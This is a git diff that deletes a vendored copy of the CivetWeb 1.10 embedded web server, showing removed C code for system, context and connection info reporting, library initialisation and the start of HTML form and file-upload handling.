-		            LUA_RELEASE,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#endif
-#if defined(USE_DUKTAPE)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"javascript\" : \"Duktape %u.%u.%u\",%s",
-		            (unsigned)DUK_VERSION / 10000,
-		            ((unsigned)DUK_VERSION / 100) % 100,
-		            (unsigned)DUK_VERSION % 100,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#endif
-	}
-
-	/* Build date */
-	{
-#if defined(__GNUC__)
-#pragma GCC diagnostic push
-/* Disable bogus compiler warning -Wdate-time */
-#pragma GCC diagnostic ignored "-Wall"
-#pragma GCC diagnostic ignored "-Werror"
-#endif
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"build\" : \"%s\",%s",
-		            __DATE__,
-		            eol);
-
-#if defined(__GNUC__)
-#pragma GCC diagnostic pop
-#endif
-
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-
-	/* Compiler information */
-	/* http://sourceforge.net/p/predef/wiki/Compilers/ */
-	{
-#if defined(_MSC_VER)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"MSC: %u (%u)\",%s",
-		            (unsigned)_MSC_VER,
-		            (unsigned)_MSC_FULL_VER,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__MINGW64__)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"MinGW64: %u.%u\",%s",
-		            (unsigned)__MINGW64_VERSION_MAJOR,
-		            (unsigned)__MINGW64_VERSION_MINOR,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"MinGW32: %u.%u\",%s",
-		            (unsigned)__MINGW32_MAJOR_VERSION,
-		            (unsigned)__MINGW32_MINOR_VERSION,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__MINGW32__)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"MinGW32: %u.%u\",%s",
-		            (unsigned)__MINGW32_MAJOR_VERSION,
-		            (unsigned)__MINGW32_MINOR_VERSION,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__clang__)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"clang: %u.%u.%u (%s)\",%s",
-		            __clang_major__,
-		            __clang_minor__,
-		            __clang_patchlevel__,
-		            __clang_version__,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__GNUC__)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"gcc: %u.%u.%u\",%s",
-		            (unsigned)__GNUC__,
-		            (unsigned)__GNUC_MINOR__,
-		            (unsigned)__GNUC_PATCHLEVEL__,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__INTEL_COMPILER)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"Intel C/C++: %u\",%s",
-		            (unsigned)__INTEL_COMPILER,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__BORLANDC__)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"Borland C: 0x%x\",%s",
-		            (unsigned)__BORLANDC__,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__SUNPRO_C)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"Solaris: 0x%x\",%s",
-		            (unsigned)__SUNPRO_C,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#else
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"other\",%s",
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#endif
-	}
-
-	/* Determine 32/64 bit data mode.
-	 * see https://en.wikipedia.org/wiki/64-bit_computing */
-	{
-		mg_snprintf(
-		    NULL,
-		    NULL,
-		    block,
-		    sizeof(block),
-		    "\"data_model\" : \"int:%u/%u/%u/%u, float:%u/%u/%u, char:%u/%u, "
-		    "ptr:%u, size:%u, time:%u\"%s",
-		    (unsigned)sizeof(short),
-		    (unsigned)sizeof(int),
-		    (unsigned)sizeof(long),
-		    (unsigned)sizeof(long long),
-		    (unsigned)sizeof(float),
-		    (unsigned)sizeof(double),
-		    (unsigned)sizeof(long double),
-		    (unsigned)sizeof(char),
-		    (unsigned)sizeof(wchar_t),
-		    (unsigned)sizeof(void *),
-		    (unsigned)sizeof(size_t),
-		    (unsigned)sizeof(time_t),
-		    eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Terminate string */
-	if ((buflen > 0) && buffer && buffer[0]) {
-		if (system_info_length < buflen) {
-			strcat0(buffer, eoobj);
-			strcat0(buffer, eol);
-		}
-	}
-	system_info_length += reserved_len;
-
-	return system_info_length;
-}
-
-
-#if defined(USE_SERVER_STATS)
-/* Get context information. It can be printed or stored by the caller.
- * Return the size of available information. */
-static int
-mg_get_context_info_impl(const struct mg_context *ctx, char *buffer, int buflen)
-
-{
-	char block[256];
-	int context_info_length = 0;
-
-#if defined(_WIN32)
-	const char *eol = "\r\n";
-#else
-	const char *eol = "\n";
-#endif
-	struct mg_memory_stat *ms = get_memory_stat((struct mg_context *)ctx);
-
-	const char *eoobj = "}";
-	int reserved_len = (int)strlen(eoobj) + (int)strlen(eol);
-
-	if ((buffer == NULL) || (buflen < 1)) {
-		buflen = 0;
-	} else {
-		*buffer = 0;
-	}
-
-	mg_snprintf(NULL, NULL, block, sizeof(block), "{%s", eol);
-	context_info_length += (int)strlen(block);
-	if (context_info_length < buflen) {
-		strcat0(buffer, block);
-	}
-
-	/* Memory information */
-	if (ms) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"memory\" : {%s"
-		            "\"blocks\" : %i,%s"
-		            "\"used\" : %" INT64_FMT ",%s"
-		            "\"maxUsed\" : %" INT64_FMT "%s"
-		            "}%s%s",
-		            eol,
-		            ms->blockCount,
-		            eol,
-		            ms->totalMemUsed,
-		            eol,
-		            ms->maxMemUsed,
-		            eol,
-		            (ctx ? "," : ""),
-		            eol);
-
-		context_info_length += (int)strlen(block);
-		if (context_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-
-	/* Connections information */
-	if (ctx) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"connections\" : {%s"
-		            "\"active\" : %i,%s"
-		            "\"maxActive\" : %i,%s"
-		            "\"total\" : %" INT64_FMT "%s"
-		            "},%s",
-		            eol,
-		            ctx->active_connections,
-		            eol,
-		            ctx->max_connections,
-		            eol,
-		            ctx->total_connections,
-		            eol,
-		            eol);
-
-		context_info_length += (int)strlen(block);
-		if (context_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Requests information */
-	if (ctx) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"requests\" : {%s"
-		            "\"total\" : %" INT64_FMT "%s"
-		            "},%s",
-		            eol,
-		            ctx->total_requests,
-		            eol,
-		            eol);
-
-		context_info_length += (int)strlen(block);
-		if (context_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Data information */
-	if (ctx) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"data\" : {%s"
-		            "\"read\" : %" INT64_FMT "%s,"
-		            "\"written\" : %" INT64_FMT "%s"
-		            "},%s",
-		            eol,
-		            ctx->total_data_read,
-		            eol,
-		            ctx->total_data_written,
-		            eol,
-		            eol);
-
-		context_info_length += (int)strlen(block);
-		if (context_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Execution time information */
-	if (ctx) {
-		char start_time_str[64] = {0};
-		char now_str[64] = {0};
-		time_t start_time = ctx->start_time;
-		time_t now = time(NULL);
-
-		gmt_time_string(start_time_str,
-		                sizeof(start_time_str) - 1,
-		                &start_time);
-		gmt_time_string(now_str, sizeof(now_str) - 1, &now);
-
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"time\" : {%s"
-		            "\"uptime\" : %.0f,%s"
-		            "\"start\" : \"%s\",%s"
-		            "\"now\" : \"%s\"%s"
-		            "}%s",
-		            eol,
-		            difftime(now, start_time),
-		            eol,
-		            start_time_str,
-		            eol,
-		            now_str,
-		            eol,
-		            eol);
-
-		context_info_length += (int)strlen(block);
-		if (context_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Terminate string */
-	if ((buflen > 0) && buffer && buffer[0]) {
-		if (context_info_length < buflen) {
-			strcat0(buffer, eoobj);
-			strcat0(buffer, eol);
-		}
-	}
-	context_info_length += reserved_len;
-
-	return context_info_length;
-}
-#endif
-
-
-#ifdef MG_EXPERIMENTAL_INTERFACES
-/* Get connection information. It can be printed or stored by the caller.
- * Return the size of available information. */
-static int
-mg_get_connection_info_impl(const struct mg_context *ctx,
-                            int idx,
-                            char *buffer,
-                            int buflen)
-{
-	const struct mg_connection *conn;
-	const struct mg_request_info *ri;
-	char block[256];
-	int connection_info_length = 0;
-	int state = 0;
-	const char *state_str = "unknown";
-
-#if defined(_WIN32)
-	const char *eol = "\r\n";
-#else
-	const char *eol = "\n";
-#endif
-
-	const char *eoobj = "}";
-	int reserved_len = (int)strlen(eoobj) + (int)strlen(eol);
-
-	if ((buffer == NULL) || (buflen < 1)) {
-		buflen = 0;
-	} else {
-		*buffer = 0;
-	}
-
-	if ((ctx == NULL) || (idx < 0)) {
-		/* Parameter error */
-		return 0;
-	}
-
-	if ((unsigned)idx >= ctx->cfg_worker_threads) {
-		/* Out of range */
-		return 0;
-	}
-
-	/* Take connection [idx]. This connection is not locked in
-	 * any way, so some other thread might use it. */
-	conn = (ctx->worker_connections) + idx;
-
-	/* Initialize output string */
-	mg_snprintf(NULL, NULL, block, sizeof(block), "{%s", eol);
-	connection_info_length += (int)strlen(block);
-	if (connection_info_length < buflen) {
-		strcat0(buffer, block);
-	}
-
-	/* Init variables */
-	ri = &(conn->request_info);
-
-#if defined(USE_SERVER_STATS)
-	state = conn->conn_state;
-
-	/* State as string */
-	switch (state) {
-	case 0:
-		state_str = "undefined";
-		break;
-	case 1:
-		state_str = "not used";
-		break;
-	case 2:
-		state_str = "init";
-		break;
-	case 3:
-		state_str = "ready";
-		break;
-	case 4:
-		state_str = "processing";
-		break;
-	case 5:
-		state_str = "processed";
-		break;
-	case 6:
-		state_str = "to close";
-		break;
-	case 7:
-		state_str = "closing";
-		break;
-	case 8:
-		state_str = "closed";
-		break;
-	case 9:
-		state_str = "done";
-		break;
-	}
-#endif
-
-	/* Connection info */
-	if ((state >= 3) && (state < 9)) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"connection\" : {%s"
-		            "\"remote\" : {%s"
-		            "\"protocol\" : \"%s\",%s"
-		            "\"addr\" : \"%s\",%s"
-		            "\"port\" : %u%s"
-		            "},%s"
-		            "\"handled_requests\" : %u%s"
-		            "},%s",
-		            eol,
-		            eol,
-		            get_proto_name(conn),
-		            eol,
-		            ri->remote_addr,
-		            eol,
-		            ri->remote_port,
-		            eol,
-		            eol,
-		            conn->handled_requests,
-		            eol,
-		            eol);
-
-		connection_info_length += (int)strlen(block);
-		if (connection_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Request info */
-	if ((state >= 4) && (state < 6)) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"request_info\" : {%s"
-		            "\"method\" : \"%s\",%s"
-		            "\"uri\" : \"%s\",%s"
-		            "\"query\" : %s%s%s%s"
-		            "},%s",
-		            eol,
-		            ri->request_method,
-		            eol,
-		            ri->request_uri,
-		            eol,
-		            ri->query_string ? "\"" : "",
-		            ri->query_string ? ri->query_string : "null",
-		            ri->query_string ? "\"" : "",
-		            eol,
-		            eol);
-
-		connection_info_length += (int)strlen(block);
-		if (connection_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Execution time information */
-	if ((state >= 2) && (state < 9)) {
-		char start_time_str[64] = {0};
-		char now_str[64] = {0};
-		time_t start_time = conn->conn_birth_time;
-		time_t now = time(NULL);
-
-		gmt_time_string(start_time_str,
-		                sizeof(start_time_str) - 1,
-		                &start_time);
-		gmt_time_string(now_str, sizeof(now_str) - 1, &now);
-
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"time\" : {%s"
-		            "\"uptime\" : %.0f,%s"
-		            "\"start\" : \"%s\",%s"
-		            "\"now\" : \"%s\"%s"
-		            "},%s",
-		            eol,
-		            difftime(now, start_time),
-		            eol,
-		            start_time_str,
-		            eol,
-		            now_str,
-		            eol,
-		            eol);
-
-		connection_info_length += (int)strlen(block);
-		if (connection_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Remote user name */
-	if ((ri->remote_user) && (state < 9)) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"user\" : {%s"
-		            "\"name\" : \"%s\",%s"
-		            "},%s",
-		            eol,
-		            ri->remote_user,
-		            eol,
-		            eol);
-
-		connection_info_length += (int)strlen(block);
-		if (connection_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Data block */
-	if (state >= 3) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"data\" : {%s"
-		            "\"read\" : %" INT64_FMT ",%s"
-		            "\"written\" : %" INT64_FMT "%s"
-		            "},%s",
-		            eol,
-		            conn->consumed_content,
-		            eol,
-		            conn->num_bytes_sent,
-		            eol,
-		            eol);
-
-		connection_info_length += (int)strlen(block);
-		if (connection_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* State */
-	mg_snprintf(NULL,
-	            NULL,
-	            block,
-	            sizeof(block),
-	            "\"state\" : \"%s\"%s",
-	            state_str,
-	            eol);
-
-	connection_info_length += (int)strlen(block);
-	if (connection_info_length + reserved_len < buflen) {
-		strcat0(buffer, block);
-	}
-
-	/* Terminate string */
-	if ((buflen > 0) && buffer && buffer[0]) {
-		if (connection_info_length < buflen) {
-			strcat0(buffer, eoobj);
-			strcat0(buffer, eol);
-		}
-	}
-	connection_info_length += reserved_len;
-
-	return connection_info_length;
-}
-#endif
-
-
-/* Get system information. It can be printed or stored by the caller.
- * Return the size of available information. */
-int
-mg_get_system_info(char *buffer, int buflen)
-{
-	if ((buffer == NULL) || (buflen < 1)) {
-		return mg_get_system_info_impl(NULL, 0);
-	} else {
-		/* Reset buffer, so we can always use strcat. */
-		buffer[0] = 0;
-		return mg_get_system_info_impl(buffer, buflen);
-	}
-}
-
-
-/* Get context information. It can be printed or stored by the caller.
- * Return the size of available information. */
-int
-mg_get_context_info(const struct mg_context *ctx, char *buffer, int buflen)
-{
-#if defined(USE_SERVER_STATS)
-	if ((buffer == NULL) || (buflen < 1)) {
-		return mg_get_context_info_impl(ctx, NULL, 0);
-	} else {
-		/* Reset buffer, so we can always use strcat. */
-		buffer[0] = 0;
-		return mg_get_context_info_impl(ctx, buffer, buflen);
-	}
-#else
-	(void)ctx;
-	if ((buffer != NULL) && (buflen > 0)) {
-		buffer[0] = 0;
-	}
-	return 0;
-#endif
-}
-
-
-#ifdef MG_EXPERIMENTAL_INTERFACES
-int
-mg_get_connection_info(const struct mg_context *ctx,
-                       int idx,
-                       char *buffer,
-                       int buflen)
-{
-	if ((buffer == NULL) || (buflen < 1)) {
-		return mg_get_connection_info_impl(ctx, idx, NULL, 0);
-	} else {
-		/* Reset buffer, so we can always use strcat. */
-		buffer[0] = 0;
-		return mg_get_connection_info_impl(ctx, idx, buffer, buflen);
-	}
-}
-#endif
-
-
-/* Initialize this library. This function does not need to be thread safe.
- */
-unsigned
-mg_init_library(unsigned features)
-{
-#if !defined(NO_SSL)
-	char ebuf[128];
-#endif
-
-	unsigned features_to_init = mg_check_feature(features & 0xFFu);
-	unsigned features_inited = features_to_init;
-
-	if (mg_init_library_called <= 0) {
-		/* Not initialized yet */
-		if (0 != pthread_mutex_init(&global_lock_mutex, NULL)) {
-			return 0;
-		}
-	}
-
-	mg_global_lock();
-
-	if (mg_init_library_called <= 0) {
-		if (0 != pthread_key_create(&sTlsKey, tls_dtor)) {
-			/* Fatal error - abort start. However, this situation should
-			 * never occur in practice. */
-			return 0;
-		}
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-		InitializeCriticalSection(&global_log_file_lock);
-#endif /* _WIN32 && !__SYMBIAN32__ */
-#if !defined(_WIN32)
-		pthread_mutexattr_init(&pthread_mutex_attr);
-		pthread_mutexattr_settype(&pthread_mutex_attr, PTHREAD_MUTEX_RECURSIVE);
-#endif
-
-#if defined(USE_LUA)
-		lua_init_optional_libraries();
-#endif
-	}
-
-
-#if !defined(NO_SSL)
-	if (features_to_init & 2) {
-		if (!mg_ssl_initialized) {
-			if (initialize_ssl(ebuf, sizeof(ebuf))) {
-				mg_ssl_initialized = 1;
-			} else {
-				(void)ebuf;
-				/* TODO: print error */
-				features_inited &= ~(2u);
-			}
-		} else {
-			/* ssl already initialized */
-		}
-	}
-#endif
-
-	/* Start WinSock for Windows */
-	if (mg_init_library_called <= 0) {
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-		WSADATA data;
-		WSAStartup(MAKEWORD(2, 2), &data);
-#endif /* _WIN32 && !__SYMBIAN32__ */
-		mg_init_library_called = 1;
-	} else {
-		mg_init_library_called++;
-	}
-
-	mg_global_unlock();
-
-	return features_inited;
-}
-
-
-/* Un-initialize this library. */
-unsigned
-mg_exit_library(void)
-{
-	if (mg_init_library_called <= 0) {
-		return 0;
-	}
-
-	mg_global_lock();
-
-	mg_init_library_called--;
-	if (mg_init_library_called == 0) {
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-		(void)WSACleanup();
-#endif /* _WIN32 && !__SYMBIAN32__ */
-#if !defined(NO_SSL)
-		if (mg_ssl_initialized) {
-			uninitialize_ssl();
-			mg_ssl_initialized = 0;
-		}
-#endif
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-		(void)DeleteCriticalSection(&global_log_file_lock);
-#endif /* _WIN32 && !__SYMBIAN32__ */
-#if !defined(_WIN32)
-		(void)pthread_mutexattr_destroy(&pthread_mutex_attr);
-#endif
-
-		(void)pthread_key_delete(sTlsKey);
-
-#if defined(USE_LUA)
-		lua_exit_optional_libraries();
-#endif
-
-		mg_global_unlock();
-		(void)pthread_mutex_destroy(&global_lock_mutex);
-		return 1;
-	}
-
-	mg_global_unlock();
-	return 1;
-}
-
-
-/* End of civetweb.c */
diff --git a/thirdparty/civetweb-1.10/src/civetweb_private_lua.h b/thirdparty/civetweb-1.10/src/civetweb_private_lua.h
deleted file mode 100644
index 47c6566..0000000
--- a/thirdparty/civetweb-1.10/src/civetweb_private_lua.h
+++ /dev/null
@@ -1,11 +0,0 @@
-/* "civetweb_private_lua.h" */
-/* Project internal header to allow main.c to call a non-public function in
- * mod_lua.inl */
-
-#ifndef CIVETWEB_PRIVATE_LUA_H
-#define CIVETWEB_PRIVATE_LUA_H
-
-int run_lua(const char *file_name);
-
-
-#endif
diff --git a/thirdparty/civetweb-1.10/src/file_ops.inl b/thirdparty/civetweb-1.10/src/file_ops.inl
deleted file mode 100644
index cfaadea..0000000
--- a/thirdparty/civetweb-1.10/src/file_ops.inl
+++ /dev/null
@@ -1 +0,0 @@
-/* currently not required */

diff --git a/thirdparty/civetweb-1.10/src/handle_form.inl b/thirdparty/civetweb-1.10/src/handle_form.inl
deleted file mode 100644
index 2a213ad..0000000
--- a/thirdparty/civetweb-1.10/src/handle_form.inl
+++ /dev/null
@@ -1,949 +0,0 @@
-/* Copyright (c) 2016-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-
-static int
-url_encoded_field_found(const struct mg_connection *conn,
-                        const char *key,
-                        size_t key_len,
-                        const char *filename,
-                        size_t filename_len,
-                        char *path,
-                        size_t path_len,
-                        struct mg_form_data_handler *fdh)
-{
-	char key_dec[1024];
-	char filename_dec[1024];
-	int key_dec_len;
-	int filename_dec_len;
-	int ret;
-
-	key_dec_len =
-	    mg_url_decode(key, (int)key_len, key_dec, (int)sizeof(key_dec), 1);
-
-	if (((size_t)key_dec_len >= (size_t)sizeof(key_dec)) || (key_dec_len < 0)) {
-		return FORM_FIELD_STORAGE_SKIP;
-	}
-
-	if (filename) {
-		filename_dec_len = mg_url_decode(filename,
-		                                 (int)filename_len,
-		                                 filename_dec,
-		                                 (int)sizeof(filename_dec),
-		                                 1);
-
-		if (((size_t)filename_dec_len >= (size_t)sizeof(filename_dec))
-		    || (filename_dec_len < 0)) {
-			/* Log error message and skip this field. */
-			mg_cry(conn, "%s: Cannot decode filename", __func__);
-			return FORM_FIELD_STORAGE_SKIP;
-		}
-	} else {
-		filename_dec[0] = 0;
-	}
-
-	ret =
-	    fdh->field_found(key_dec, filename_dec, path, path_len, fdh->user_data);
-
-	if ((ret & 0xF) == FORM_FIELD_STORAGE_GET) {
-		if (fdh->field_get == NULL) {
-			mg_cry(conn, "%s: Function \"Get\" not available", __func__);
-			return FORM_FIELD_STORAGE_SKIP;
-		}
-	}
-	if ((ret & 0xF) == FORM_FIELD_STORAGE_STORE) {
-		if (fdh->field_store == NULL) {
-			mg_cry(conn, "%s: Function \"Store\" not available", __func__);
-			return FORM_FIELD_STORAGE_SKIP;
-		}
-	}
-
-	return ret;
-}
-
-
-static int
-url_encoded_field_get(const struct mg_connection *conn,
-                      const char *key,
-                      size_t key_len,
-                      const char *value,
-                      size_t value_len,
-                      struct mg_form_data_handler *fdh)
-{
-	char key_dec[1024];
-
-	char *value_dec = (char *)mg_malloc_ctx(value_len + 1, conn->ctx);
-	int value_dec_len, ret;
-
-	if (!value_dec) {
-		/* Log error message and stop parsing the form data. */
-		mg_cry(conn,
-		       "%s: Not enough memory (required: %lu)",
-		       __func__,
-		       (unsigned long)(value_len + 1));
-		return FORM_FIELD_STORAGE_ABORT;
-	}
-
-	mg_url_decode(key, (int)key_len, key_dec, (int)sizeof(key_dec), 1);
-
-	value_dec_len =
-	    mg_url_decode(value, (int)value_len, value_dec, (int)value_len + 1, 1);
-
-	ret = fdh->field_get(key_dec,
-	                     value_dec,
-	                     (size_t)value_dec_len,
-	                     fdh->user_data);
-
-	mg_free(value_dec);
-
-	return ret;
-}
-
-
-static int
-unencoded_field_get(const struct mg_connection *conn,
-                    const char *key,
-                    size_t key_len,
-                    const char *value,
-                    size_t value_len,
-                    struct mg_form_data_handler *fdh)
-{
-	char key_dec[1024];
-	(void)conn;
-
-	mg_url_decode(key, (int)key_len, key_dec, (int)sizeof(key_dec), 1);
-
-	return fdh->field_get(key_dec, value, value_len, fdh->user_data);
-}
-
-
-static int
-field_stored(const struct mg_connection *conn,
-             const char *path,
-             long long file_size,
-             struct mg_form_data_handler *fdh)
-{
-	/* Equivalent to "upload" callback of "mg_upload". */
-
-	(void)conn; /* we do not need mg_cry here, so conn is currently unused */
-
-	return fdh->field_store(path, file_size, fdh->user_data);
-}
-
-
-static const char *
-search_boundary(const char *buf,
-                size_t buf_len,
-                const char *boundary,
-                size_t boundary_len)
-{
-	/* We must do a binary search here, not a string search, since the buffer
-	 * may contain '\x00' bytes, if binary data is transferred. */
-	int clen = (int)buf_len - (int)boundary_len - 4;
-	int i;
-
-	for (i = 0; i <= clen; i++) {
-		if (!memcmp(buf + i, "\r\n--", 4)) {
-			if (!memcmp(buf + i + 4, boundary, boundary_len)) {
-				return buf + i;
-			}
-		}
-	}
-	return NULL;
-}
-
-
-int
-mg_handle_form_request(struct mg_connection *conn,
-                       struct mg_form_data_handler *fdh)
-{
-	const char *content_type;
-	char path[512];
-	char buf[1024]; /* Must not be smaller than ~900 - see sanity check */
-	int field_storage;
-	int buf_fill = 0;
-	int r;
-	int field_count = 0;
-	struct mg_file fstore = STRUCT_FILE_INITIALIZER;
-	int64_t file_size = 0; /* init here, to a avoid a false positive
-	                         "uninitialized variable used" warning */
-
-	int has_body_data =
-	    (conn->request_info.content_length > 0) || (conn->is_chunked);
-
-	/* There are three ways to encode data from a HTML form:
-	 * 1) method: GET (default)
-	 *    The form data is in the HTTP query string.
-	 * 2) method: POST, enctype: "application/x-www-form-urlencoded"
-	 *    The form data is in the request body.
-	 *    The body is url encoded (the default encoding for POST).
-	 * 3) method: POST, enctype: "multipart/form-data".
-	 *    The form data is in the request body of a multipart message.
-	 *    This is the typical way to handle file upload from a form.
-	 */
-
-	if (!has_body_data) {
-		const char *data;
-
-		if (strcmp(conn->request_info.request_method, "GET")) {
-			/* No body data, but not a GET request.
-			 * This is not a valid form request. */
-			return -1;
-		}
-
-		/* GET request: form data is in the query string. */
-		/* The entire data has already been loaded, so there is no nead to
-		 * call mg_read. We just need to split the query string into key-value
-		 * pairs. */
-		data = conn->request_info.query_string;
-		if (!data) {
-			/* No query string. */
-			return -1;
-		}
-
-		/* Split data in a=1&b=xy&c=3&c=4 ... */
-		while (*data) {
-			const char *val = strchr(data, '=');
-			const char *next;
-			ptrdiff_t keylen, vallen;
-
-			if (!val) {
-				break;
-			}
-			keylen = val - data;
-
-			/* In every "field_found" callback we ask what to do with the
-			 * data ("field_storage"). This could be:
-			 * FORM_FIELD_STORAGE_SKIP (0) ... ignore the value of this field
-			 * FORM_FIELD_STORAGE_GET (1) ... read the data and call the get
-			 *                              callback function
-			 * FORM_FIELD_STORAGE_STORE (2) ... store the data in a file
-			 * FORM_FIELD_STORAGE_READ (3) ... let the user read the data
-			 *                               (for parsing long data on the fly)
-			 *                               (currently not implemented)
-			 * FORM_FIELD_STORAGE_ABORT (flag) ... stop parsing
-			 */
-			memset(path, 0, sizeof(path));
-			field_count++;
-			field_storage = url_encoded_field_found(conn,
-			                                        data,
-			                                        (size_t)keylen,
-			                                        NULL,
-			                                        0,
-			                                        path,
-			                                        sizeof(path) - 1,
-			                                        fdh);
-
-			val++;
-			next = strchr(val, '&');
-			if (next) {
-				vallen = next - val;
-				next++;
-			} else {
-				vallen = (ptrdiff_t)strlen(val);
-				next = val + vallen;
-			}
-
-			if (field_storage == FORM_FIELD_STORAGE_GET) {
-				/* Call callback */
-				url_encoded_field_get(
-				    conn, data, (size_t)keylen, val, (size_t)vallen, fdh);
-			}
-			if (field_storage == FORM_FIELD_STORAGE_STORE) {
-				/* Store the content to a file */
-				if (mg_fopen(conn, path, MG_FOPEN_MODE_WRITE, &fstore) == 0) {
-					fstore.access.fp = NULL;
-				}
-				file_size = 0;
-				if (fstore.access.fp != NULL) {
-					size_t n = (size_t)
-					    fwrite(val, 1, (size_t)vallen, fstore.access.fp);
-					if ((n != (size_t)vallen) || (ferror(fstore.access.fp))) {
-						mg_cry(conn,
-						       "%s: Cannot write file %s",
-						       __func__,
-						       path);
-						(void)mg_fclose(&fstore.access);
-						remove_bad_file(conn, path);
-					}
-					file_size += (int64_t)n;
-
-					if (fstore.access.fp) {
-						r = mg_fclose(&fstore.access);
-						if (r == 0) {
-							/* stored successfully */
-							field_stored(conn, path, file_size, fdh);
-						} else {
-							mg_cry(conn,
-							       "%s: Error saving file %s",
-							       __func__,
-							       path);
-							remove_bad_file(conn, path);
-						}
-						fstore.access.fp = NULL;
-					}
-
-				} else {
-					mg_cry(conn, "%s: Cannot create file %s", __func__, path);
